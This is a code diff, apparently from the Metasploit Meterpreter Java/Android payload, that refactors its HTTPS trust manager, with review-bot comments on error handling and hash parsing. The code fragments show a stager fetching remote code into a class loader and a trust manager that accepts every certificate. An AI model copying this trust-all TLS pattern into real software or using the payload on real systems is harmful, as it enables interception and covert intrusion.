remove duplicated PayloadTrustManager
parent
d411bfc90b
commit
92a598101f
@ -15,6 +15,7 @@ import java.net.URL;
|
||||
import java.net.URLConnection;
|
||||
import java.util.concurrent.TimeUnit;
|
||||
|
||||
import com.metasploit.meterpreter.PayloadTrustManager;
|
||||
import dalvik.system.DexClassLoader;
|
||||
|
||||
public class Payload {
|
||||
@ -111,7 +112,7 @@ public class Payload {
|
||||
InputStream inStream;
|
||||
if (url.startsWith("https")) {
|
||||
URLConnection uc = new URL(url).openConnection();
|
||||
Class.forName("com.metasploit.stage.PayloadTrustManager").getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, uc);
|
||||
PayloadTrustManager.useFor(uc, CERT_HASH);
|
||||
inStream = uc.getInputStream();
|
||||
} else {
|
||||
inStream = new URL(url).openStream();
|
||||
|
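Review bot: The direct call `PayloadTrustManager.useFor(uc, CERT_HASH);` and the new import give `Payload` a static reference to the trust manager, which the class comment on `PayloadTrustManager` says the separate class was meant to avoid ("would have made it impossible for other/older JREs to load it"). The reflective `Class.forName(...)` lookup being replaced was the indirection that kept that reference out of `Payload`. If the constraint no longer applies to this stage, the class comment should be updated to match, for example `* Kept as a separate class for historical reasons; Payload now references it directly.` The method containing this branch starts and ends outside the hunk.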
@ -143,11 +143,6 @@ public class AndroidMeterpreter extends Meterpreter {
|
||||
this.intervalCollectionManager.stop();
|
||||
}
|
||||
|
||||
@Override
|
||||
protected String getPayloadTrustManager() {
|
||||
return "com.metasploit.stage.PayloadTrustManager";
|
||||
}
|
||||
|
||||
@Override
|
||||
public String[] loadExtension(byte[] data) throws Exception {
|
||||
getCommandManager().resetNewCommands();
|
||||
|
@ -7,7 +7,6 @@ import com.metasploit.meterpreter.Meterpreter;
|
||||
import com.metasploit.meterpreter.TLVPacket;
|
||||
import com.metasploit.meterpreter.TLVType;
|
||||
import com.metasploit.meterpreter.command.Command;
|
||||
import com.metasploit.stage.PayloadTrustManager;
|
||||
|
||||
public class clipboard_set_data implements Command {
|
||||
|
||||
|
@ -17,7 +17,6 @@ public class HttpTransport extends Transport {
|
||||
private static final int PROXY_USER_LEN = 64;
|
||||
private static final int PROXY_PASS_LEN = 64;
|
||||
private static final int CERT_HASH_LEN = 20;
|
||||
private static final String TRUST_MANAGER = "com.metasploit.meterpreter.PayloadTrustManager";
|
||||
|
||||
private URL targetUrl = null;
|
||||
private URL nextUrl = null;
|
||||
@ -264,10 +263,12 @@ public class HttpTransport extends Transport {
|
||||
|
||||
if (this.targetUrl.getProtocol().equals("https")) {
|
||||
try {
|
||||
Class.forName(TRUST_MANAGER).getMethod("useFor", new Class[]{URLConnection.class})
|
||||
.invoke(null, new Object[]{conn});
|
||||
}
|
||||
catch (Exception ex) {
|
||||
String certHashHex = null;
|
||||
if (certHash != null) {
|
||||
certHashHex = PayloadTrustManager.bytesToHex(certHash);
|
||||
}
|
||||
PayloadTrustManager.useFor(conn, certHashHex);
|
||||
} catch (Exception ex) {
|
||||
// perhaps log?
|
||||
}
|
||||
}
|
||||
|
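Review bot: The `catch (Exception ex)` kept at the end of the https branch still contains only `// perhaps log?`, so a failure in `bytesToHex` or `useFor` is silent. The request then proceeds with whatever trust settings `conn` already had, not with the configured certificate hash. Now that the call is direct rather than reflective, the reflection exceptions are gone, so the catch could be narrowed and the failure surfaced, e.g. rethrown as an `IOException` with `ex` as its cause if the enclosing method permits. The enclosing method starts and ends outside the hunk, so its throws clause is not visible here.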
@ -220,10 +220,6 @@ public class Meterpreter {
|
||||
}
|
||||
}
|
||||
|
||||
protected String getPayloadTrustManager() {
|
||||
return "com.metasploit.meterpreter.PayloadTrustManager";
|
||||
}
|
||||
|
||||
/**
|
||||
* Get the command manager, used to register or lookup commands.
|
||||
*/
|
||||
|
@ -1,64 +0,0 @@
|
||||
package com.metasploit.meterpreter;
|
||||
|
||||
import java.net.URLConnection;
|
||||
|
||||
import javax.net.ssl.HostnameVerifier;
|
||||
import javax.net.ssl.HttpsURLConnection;
|
||||
import javax.net.ssl.SSLContext;
|
||||
import javax.net.ssl.SSLSession;
|
||||
import javax.net.ssl.SSLSocketFactory;
|
||||
import javax.net.ssl.TrustManager;
|
||||
import javax.net.ssl.X509TrustManager;
|
||||
|
||||
import java.security.cert.X509Certificate;
|
||||
|
||||
/**
|
||||
* Trust manager used for HTTPS URL connection. This is in its own class because it
|
||||
* depends on classes only present on Sun JRE 1.4+, and incorporating it into
|
||||
* the main {@link Meterpreter} class would have made it impossible for other/older
|
||||
* JREs to load it.
|
||||
* <p/>
|
||||
* This class is substantically identical to the metasploit.PayloadTrustManager class,
|
||||
* only that it tries to cache the ssl context and trust manager between calls.
|
||||
*/
|
||||
public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
|
||||
|
||||
public X509Certificate[] getAcceptedIssuers() {
|
||||
// no preferred issuers
|
||||
return new X509Certificate[0];
|
||||
}
|
||||
|
||||
public void checkClientTrusted(java.security.cert.X509Certificate[] certs, String authType) {
|
||||
// trust everyone
|
||||
}
|
||||
|
||||
public void checkServerTrusted(java.security.cert.X509Certificate[] certs, String authType) {
|
||||
// trust everyone
|
||||
}
|
||||
|
||||
public boolean verify(String hostname, SSLSession session) {
|
||||
// trust everyone
|
||||
return true;
|
||||
}
|
||||
|
||||
private static PayloadTrustManager instance;
|
||||
private static SSLSocketFactory factory;
|
||||
|
||||
/**
|
||||
* Called by the {@link Payload} class to modify the given
|
||||
* {@link URLConnection} so that it uses this trust manager.
|
||||
*/
|
||||
public static synchronized void useFor(URLConnection uc) throws Exception {
|
||||
if (uc instanceof HttpsURLConnection) {
|
||||
HttpsURLConnection huc = ((HttpsURLConnection) uc);
|
||||
if (instance == null) {
|
||||
instance = new PayloadTrustManager();
|
||||
SSLContext sc = SSLContext.getInstance("SSL");
|
||||
sc.init(null, new TrustManager[]{instance}, new java.security.SecureRandom());
|
||||
factory = sc.getSocketFactory();
|
||||
}
|
||||
huc.setSSLSocketFactory(factory);
|
||||
huc.setHostnameVerifier(instance);
|
||||
}
|
||||
}
|
||||
}
|
@ -31,7 +31,7 @@
|
||||
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
|
||||
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
*/
|
||||
package com.metasploit.stage;
|
||||
package com.metasploit.meterpreter;
|
||||
|
||||
import java.net.URLConnection;
|
||||
|
||||
@ -51,11 +51,17 @@ import java.security.cert.X509Certificate;
|
||||
/**
|
||||
* Trust manager used for HTTPS stagers. This is in its own class because it
|
||||
* depends on classes only present on Sun JRE 1.4+, and incorporating it into
|
||||
* the main {@link Payload} class would have made it impossible for other/older
|
||||
* the main Payload class would have made it impossible for other/older
|
||||
* JREs to load it.
|
||||
*/
|
||||
public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
|
||||
|
||||
private String certHash;
|
||||
|
||||
private PayloadTrustManager(String certHash) {
|
||||
this.certHash = certHash;
|
||||
}
|
||||
|
||||
public X509Certificate[] getAcceptedIssuers() {
|
||||
// no preferred issuers
|
||||
return new X509Certificate[0];
|
||||
@ -86,7 +92,11 @@ public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
|
||||
public void checkServerTrusted(java.security.cert.X509Certificate[] certs,
|
||||
String authType) throws CertificateException {
|
||||
|
||||
String payloadHash = Payload.CERT_HASH.substring(4).trim();
|
||||
if (certHash == null) {
|
||||
// No HandlerSSLCert set on payload, trust everyone
|
||||
return;
|
||||
}
|
||||
String payloadHash = certHash.substring(4).trim();
|
||||
if (payloadHash.length() == 0) {
|
||||
// No HandlerSSLCert set on payload, trust everyone
|
||||
return;
|
||||
@ -112,13 +122,13 @@ public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
|
||||
}
|
||||
|
||||
/**
|
||||
* Called by the {@link Payload} class to modify the given
|
||||
* Called by the Payload class to modify the given
|
||||
* {@link URLConnection} so that it uses this trust manager.
|
||||
*/
|
||||
public static void useFor(URLConnection uc) throws Exception {
|
||||
public static void useFor(URLConnection uc, String certHash) throws Exception {
|
||||
if (uc instanceof HttpsURLConnection) {
|
||||
HttpsURLConnection huc = ((HttpsURLConnection) uc);
|
||||
PayloadTrustManager ptm = new PayloadTrustManager();
|
||||
PayloadTrustManager ptm = new PayloadTrustManager(certHash);
|
||||
SSLContext sc = SSLContext.getInstance("SSL");
|
||||
sc.init(null, new TrustManager[]{ptm},
|
||||
new java.security.SecureRandom());
|
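Review bot: `String payloadHash = certHash.substring(4).trim();` in `checkServerTrusted` assumes every caller passes a value with a four-character prefix, as `Payload.CERT_HASH` apparently does, but `HttpTransport` now passes `PayloadTrustManager.bytesToHex(certHash)`. Unless `bytesToHex` prepends four characters (its body is not visible here), the first four hex digits are dropped and the comparison cannot match. A value shorter than four characters would also throw `StringIndexOutOfBoundsException` rather than `CertificateException`. Consider stripping the prefix at the one caller that has it, `PayloadTrustManager.useFor(uc, CERT_HASH.substring(4).trim());`, and using `String payloadHash = certHash.trim();` here. The `useFor` Javadoc should also document the new parameter, e.g. `@param certHash hex hash to compare against, or null to skip the check`. Both methods continue outside their hunks.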